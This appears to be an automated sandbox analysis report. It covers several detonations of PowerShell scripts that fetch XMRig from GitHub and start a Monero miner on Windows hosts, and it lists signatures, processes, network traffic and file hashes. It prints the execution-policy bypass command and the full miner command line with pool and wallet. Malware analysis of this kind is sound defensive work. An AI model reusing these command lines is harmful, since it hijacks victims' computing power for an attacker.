N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/2832-0-0x00007FFF4A593000-0x00007FFF4A595000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n0ldgsbq.ypp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2832-9-0x000002018C9E0000-0x000002018CA02000-memory.dmp

memory/2832-10-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

memory/2832-11-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

memory/2832-12-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

memory/2832-14-0x00000201A5440000-0x00000201A5452000-memory.dmp

memory/2832-15-0x00000201A50C0000-0x00000201A50CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4732-46-0x0000019FDF510000-0x0000019FDF530000-memory.dmp

memory/4732-47-0x0000019FDF560000-0x0000019FDF580000-memory.dmp

memory/4732-48-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-51-0x0000019FDF5A0000-0x0000019FDF5C0000-memory.dmp

memory/4732-50-0x0000019FDF580000-0x0000019FDF5A0000-memory.dmp

memory/2832-49-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

memory/2832-53-0x00007FFF4A593000-0x00007FFF4A595000-memory.dmp

memory/4732-52-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-54-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-55-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-56-0x0000019FDF580000-0x0000019FDF5A0000-memory.dmp

memory/4732-57-0x0000019FDF5A0000-0x0000019FDF5C0000-memory.dmp

memory/4732-58-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-59-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-60-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-61-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-62-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-63-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-64-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-65-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-66-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-67-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-68-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-69-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-70-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-71-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-72-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-73-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-74-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-75-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-76-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-77-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-78-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-79-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-80-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-81-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-82-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-83-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-84-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-85-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-86-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-87-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-88-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-89-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-90-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-91-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-92-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-93-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-94-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-95-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-96-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-97-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-98-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-99-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-100-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-101-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-102-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-103-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-104-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-105-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-106-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-107-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-108-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-109-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-110-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-111-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-112-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-113-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-114-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-115-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

memory/4732-116-0x00007FF787F40000-0x00007FF788B73000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:46

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1792s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 35.197.79.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/3104-3-0x00007FFEBBF73000-0x00007FFEBBF74000-memory.dmp

memory/3104-5-0x000002053A8F0000-0x000002053A912000-memory.dmp

memory/3104-8-0x00007FFEBBF70000-0x00007FFEBC95C000-memory.dmp

memory/3104-10-0x00007FFEBBF70000-0x00007FFEBC95C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xwgvbqe1.f5e.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3104-9-0x000002053ABB0000-0x000002053AC26000-memory.dmp

memory/3104-25-0x00007FFEBBF70000-0x00007FFEBC95C000-memory.dmp

memory/3104-48-0x000002053A980000-0x000002053A992000-memory.dmp

memory/3104-61-0x000002053A970000-0x000002053A97A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4192-90-0x000001FF4B700000-0x000001FF4B720000-memory.dmp

memory/4192-91-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/3104-92-0x00007FFEBBF70000-0x00007FFEBC95C000-memory.dmp

memory/3104-94-0x00007FFEBBF73000-0x00007FFEBBF74000-memory.dmp

memory/4192-93-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/3104-95-0x00007FFEBBF70000-0x00007FFEBC95C000-memory.dmp

memory/3104-96-0x00007FFEBBF70000-0x00007FFEBC95C000-memory.dmp

memory/4192-97-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-98-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-99-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-100-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-101-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-102-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-103-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-104-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-105-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-106-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-107-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-108-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-109-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-110-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-111-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-112-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-113-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-114-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-115-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-116-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-117-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-118-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-119-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-120-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-121-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-122-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-123-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-124-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-125-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-126-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-127-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-128-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-129-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-130-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-131-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-132-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-133-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-134-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-135-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-136-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-137-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-138-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-139-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-140-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-141-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-142-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-143-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-144-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-145-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-146-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-147-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-148-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-149-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-150-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-151-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-152-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-153-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-154-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-155-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-156-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

memory/4192-157-0x00007FF6A70C0000-0x00007FF6A7CF3000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:31

Platform

win7-20240215-en

Max time kernel

1562s

Max time network

1563s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Network

N/A

Files

memory/2320-4-0x000007FEF60DE000-0x000007FEF60DF000-memory.dmp

memory/2320-8-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

memory/2320-7-0x0000000002240000-0x0000000002248000-memory.dmp

memory/2320-6-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

memory/2320-5-0x000000001B6B0000-0x000000001B992000-memory.dmp

memory/2320-9-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

memory/2320-10-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

memory/2320-11-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

memory/2320-12-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:31

Platform

win7-20240508-en

Max time kernel

1563s

Max time network

1563s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Network

N/A

Files

memory/1736-4-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

memory/1736-7-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/1736-6-0x0000000002240000-0x0000000002248000-memory.dmp

memory/1736-8-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/1736-9-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/1736-10-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/1736-5-0x000000001B5A0000-0x000000001B882000-memory.dmp

memory/1736-11-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/1736-12-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:49

Platform

win10-20240404-en

Max time kernel

1793s

Max time network

1786s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp

Files

memory/308-3-0x00007FF85FEF3000-0x00007FF85FEF4000-memory.dmp

memory/308-5-0x000001973F0A0000-0x000001973F0C2000-memory.dmp

memory/308-9-0x000001973F250000-0x000001973F2C6000-memory.dmp

memory/308-8-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

memory/308-18-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hli1rsun.ivn.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
